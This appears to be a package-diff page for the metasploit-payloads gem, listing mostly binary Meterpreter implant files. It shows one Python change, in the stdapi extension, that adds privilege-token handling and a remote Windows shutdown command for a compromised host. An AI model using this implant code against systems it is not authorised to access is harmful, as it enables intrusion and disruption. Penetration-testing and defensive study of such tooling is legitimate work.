metasploit-payloads 2.0.97 → 2.0.98

Sign up to get free protection for your applications and to get access to all the features.
Files changed (76) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/data/android/meterpreter.jar +0 -0
  4. data/data/android/metstage.jar +0 -0
  5. data/data/android/shell.jar +0 -0
  6. data/data/meterpreter/elevator.x64.debug.dll +0 -0
  7. data/data/meterpreter/elevator.x64.dll +0 -0
  8. data/data/meterpreter/elevator.x86.debug.dll +0 -0
  9. data/data/meterpreter/elevator.x86.dll +0 -0
  10. data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
  11. data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
  12. data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
  13. data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
  14. data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
  15. data/data/meterpreter/ext_server_espia.x64.dll +0 -0
  16. data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
  17. data/data/meterpreter/ext_server_espia.x86.dll +0 -0
  18. data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
  19. data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
  20. data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
  21. data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
  22. data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
  23. data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
  24. data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
  25. data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
  26. data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
  27. data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
  28. data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
  29. data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
  30. data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
  31. data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
  32. data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
  33. data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
  34. data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
  35. data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
  36. data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
  37. data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
  38. data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
  39. data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
  40. data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
  41. data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
  42. data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
  43. data/data/meterpreter/ext_server_priv.x64.dll +0 -0
  44. data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
  45. data/data/meterpreter/ext_server_priv.x86.dll +0 -0
  46. data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
  47. data/data/meterpreter/ext_server_python.x64.dll +0 -0
  48. data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
  49. data/data/meterpreter/ext_server_python.x86.dll +0 -0
  50. data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
  51. data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
  52. data/data/meterpreter/ext_server_stdapi.py +89 -0
  53. data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
  54. data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
  55. data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
  56. data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
  57. data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
  58. data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
  59. data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
  60. data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
  61. data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
  62. data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
  63. data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
  64. data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
  65. data/data/meterpreter/metsrv.x64.debug.dll +0 -0
  66. data/data/meterpreter/metsrv.x64.dll +0 -0
  67. data/data/meterpreter/metsrv.x86.debug.dll +0 -0
  68. data/data/meterpreter/metsrv.x86.dll +0 -0
  69. data/data/meterpreter/screenshot.x64.debug.dll +0 -0
  70. data/data/meterpreter/screenshot.x64.dll +0 -0
  71. data/data/meterpreter/screenshot.x86.debug.dll +0 -0
  72. data/data/meterpreter/screenshot.x86.dll +0 -0
  73. data/lib/metasploit-payloads/version.rb +1 -1
  74. data.tar.gz.sig +0 -0
  75. metadata +2 -2
  76. metadata.gz.sig +1 -3
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 49f65721e1a9aa745903acaa4c78087d20494cd1cc064e4101ce866eb62eb7fb
4
- data.tar.gz: be91cc58bcee64d662b1b292fd342f4d7db00a8444edaeaa829011b922c497a3
3
+ metadata.gz: e258521427e2bc71990e2e646fbf617fc70569fc6a1ca41d886eea9a6a5dd9c2
4
+ data.tar.gz: 77d18985a73b5f3e87f77cfb6f15d346b1316e03ea05bde053e23c828aa432f4
5
5
  SHA512:
6
- metadata.gz: 26baf826a30e01d34f7f7cc65d733ff97a0677fa9a315ddc167a3522dae0b56972a8f5ea3963c0765c8e8b398edcbd404720d29bb35b0ae2c380a39c62ca47c0
7
- data.tar.gz: db20a24fb97fe4b781708c7df06ee2b92f04d0440c7c983b368cafa367fb67c40101a6168d7848f4606f38f119bef7b4de0cca3fcfa65561dcc575f30baa5d6d
6
+ metadata.gz: cee1509b9a8f0780c1d5d02d87f6412a463275d6a72743767c4229115448a86a63e25cddb529cd6e2ee4ea2aa44ecfd7f3b331de74b3b085c35961b45e8fb436
7
+ data.tar.gz: bc60aa01a5781c8a22d78be70fa02665456552fe4fb44c867655ed3e88834f790c3b55c4176d4c1e036bec0a0425b701842f1ab3c3753516f04e0e56aa0970c4
checksums.yaml.gz.sig CHANGED
Binary file
data/data/android/meterpreter.jar CHANGED
Binary file
data/data/android/metstage.jar CHANGED
Binary file
data/data/android/shell.jar CHANGED
Binary file
data/data/meterpreter/elevator.x64.dll CHANGED
Binary file
data/data/meterpreter/elevator.x86.dll CHANGED
Binary file
data/data/meterpreter/ext_server_stdapi.py CHANGED
@@ -21,6 +21,9 @@ except ImportError:
21
21
  has_ctypes = False
22
22
  has_windll = False
23
23
 
24
+ if has_windll:
25
+ from ctypes import wintypes
26
+
24
27
  try:
25
28
  import pty
26
29
  has_pty = True
@@ -357,6 +360,36 @@ if has_ctypes:
357
360
  ("lpszProxy", ctypes.c_wchar_p),
358
361
  ("lpszProxyBypass", ctypes.c_wchar_p)]
359
362
 
363
+ class LUID(ctypes.Structure):
364
+ _fields_ = [
365
+ ('LowPart', wintypes.DWORD),
366
+ ('HighPart', wintypes.LONG)
367
+ ]
368
+
369
+ def __eq__(self, __o):
370
+ return (self.LowPart == __o.LowPart and self.HighPart == __o.HighPart)
371
+
372
+ def __ne__(self, __o):
373
+ return (self.LowPart != __o.LowPart or self.HighPart != __o.HighPart)
374
+
375
+ class LUID_AND_ATTRIBUTES(ctypes.Structure):
376
+ _fields_ = [
377
+ ('Luid', LUID),
378
+ ('Attributes', wintypes.DWORD)
379
+ ]
380
+
381
+ class TOKEN_PRIVILEGES(ctypes.Structure):
382
+ _fields_ = [
383
+ ('PrivilegeCount', wintypes.DWORD),
384
+ ('Privileges', LUID_AND_ATTRIBUTES * 0),
385
+ ]
386
+ def get_array(self):
387
+ array_type = LUID_AND_ATTRIBUTES * self.PrivilegeCount
388
+ return ctypes.cast(self.Privileges, ctypes.POINTER(array_type)).contents
389
+
390
+ PTOKEN_PRIVILEGES = ctypes.POINTER(TOKEN_PRIVILEGES)
391
+
392
+
360
393
  #
361
394
  # Linux Structures
362
395
  #
@@ -999,6 +1032,45 @@ def windll_GetVersion():
999
1032
  dwBuild = ((dwVersion & 0xffff0000) >> 16)
1000
1033
  return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
1001
1034
 
1035
+ def enable_privilege(name, enable=True):
1036
+ TOKEN_ALL_ACCESS = 0xf01ff
1037
+ SE_PRIVILEGE_ENABLED = 0x00000002
1038
+
1039
+ GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
1040
+ GetCurrentProcess.restype = wintypes.HANDLE
1041
+
1042
+ OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken
1043
+ OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
1044
+ OpenProcessToken.restype = wintypes.BOOL
1045
+
1046
+ LookupPrivilegeValue = ctypes.windll.advapi32.LookupPrivilegeValueW
1047
+ LookupPrivilegeValue.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, ctypes.POINTER(LUID)]
1048
+ LookupPrivilegeValue.restype = wintypes.BOOL
1049
+
1050
+ AdjustTokenPrivileges = ctypes.windll.advapi32.AdjustTokenPrivileges
1051
+ AdjustTokenPrivileges.argtypes = [wintypes.HANDLE, wintypes.BOOL, PTOKEN_PRIVILEGES, wintypes.DWORD, PTOKEN_PRIVILEGES, ctypes.POINTER(wintypes.DWORD)]
1052
+ AdjustTokenPrivileges.restype = wintypes.BOOL
1053
+
1054
+ token = wintypes.HANDLE()
1055
+ success = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token)
1056
+ if not success:
1057
+ return False
1058
+
1059
+ luid = LUID()
1060
+ name = ctypes.create_unicode_buffer(name)
1061
+ success = LookupPrivilegeValue(None, name, luid)
1062
+ if not success:
1063
+ return False
1064
+
1065
+ size = ctypes.sizeof(TOKEN_PRIVILEGES)
1066
+ size += ctypes.sizeof(LUID_AND_ATTRIBUTES)
1067
+ buffer = ctypes.create_string_buffer(size)
1068
+ tokenPrivileges = ctypes.cast(buffer, PTOKEN_PRIVILEGES).contents
1069
+ tokenPrivileges.PrivilegeCount = 1
1070
+ tokenPrivileges.get_array()[0].Luid = luid
1071
+ tokenPrivileges.get_array()[0].Attributes = SE_PRIVILEGE_ENABLED if enable else 0
1072
+ return AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None)
1073
+
1002
1074
  @register_function
1003
1075
  def channel_open_stdapi_fs_file(request, response):
1004
1076
  fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
@@ -1335,6 +1407,23 @@ def stdapi_sys_process_get_processes(request, response):
1335
1407
  return stdapi_sys_process_get_processes_via_ps(request, response)
1336
1408
  return ERROR_FAILURE, response
1337
1409
 
1410
+ @register_function_if(has_windll)
1411
+ def stdapi_sys_power_exitwindows(request, response):
1412
+ SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
1413
+
1414
+ flags = packet_get_tlv(request, TLV_TYPE_POWER_FLAGS)['value']
1415
+ reason = packet_get_tlv(request, TLV_TYPE_POWER_REASON)['value']
1416
+
1417
+ if not enable_privilege(SE_SHUTDOWN_NAME):
1418
+ return error_result_windows(), response
1419
+
1420
+ ExitWindowsEx = ctypes.windll.user32.ExitWindowsEx
1421
+ ExitWindowsEx.argtypes = [ctypes.c_uint32, ctypes.c_ulong]
1422
+ ExitWindowsEx.restype = ctypes.c_int8
1423
+ if not ExitWindowsEx(flags, reason):
1424
+ return error_result_windows(), response
1425
+ return ERROR_SUCCESS, response
1426
+
1338
1427
  @register_function_if(has_windll)
1339
1428
  def stdapi_sys_eventlog_open(request, response):
1340
1429
  source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']
data/data/meterpreter/metsrv.x64.debug.dll CHANGED
Binary file
data/data/meterpreter/metsrv.x64.dll CHANGED
Binary file
data/data/meterpreter/metsrv.x86.debug.dll CHANGED
Binary file
data/data/meterpreter/metsrv.x86.dll CHANGED
Binary file
data/data/meterpreter/screenshot.x64.dll CHANGED
Binary file
data/data/meterpreter/screenshot.x86.dll CHANGED
Binary file
data/lib/metasploit-payloads/version.rb CHANGED
@@ -1,6 +1,6 @@
1
1
  # -*- coding:binary -*-
2
2
  module MetasploitPayloads
3
- VERSION = '2.0.97'
3
+ VERSION = '2.0.98'
4
4
 
5
5
  def self.version
6
6
  VERSION
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: metasploit-payloads
3
3
  version: !ruby/object:Gem::Version
4
- version: 2.0.97
4
+ version: 2.0.98
5
5
  platform: ruby
6
6
  authors:
7
7
  - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
96
96
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
97
97
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
98
98
  -----END CERTIFICATE-----
99
- date: 2022-09-29 00:00:00.000000000 Z
99
+ date: 2022-11-03 00:00:00.000000000 Z
100
100
  dependencies:
101
101
  - !ruby/object:Gem::Dependency
102
102
  name: rake
metadata.gz.sig CHANGED
@@ -1,3 +1 @@
1
- jA����AXoX.�p��Ao�:�9��UG����"+/P��Rg��>��jy۱"1Q
2
- L������o.���5;�G�5�u����S
3
- ��6l�7~���3�{��DUHՃ ��d6Yn���R���7��Li�SO�I��̡�p�8��5L��~p,����3�Ff�7��$���n57
1
+ ��SIg}%��~҂�9[8~V�i��ى�&b��B_`Q)(W��&��Q���ը��;�0i��d䗿ΠL�Y�\����C%�J��J6<�d�'�Trh��5�)��<�L�|���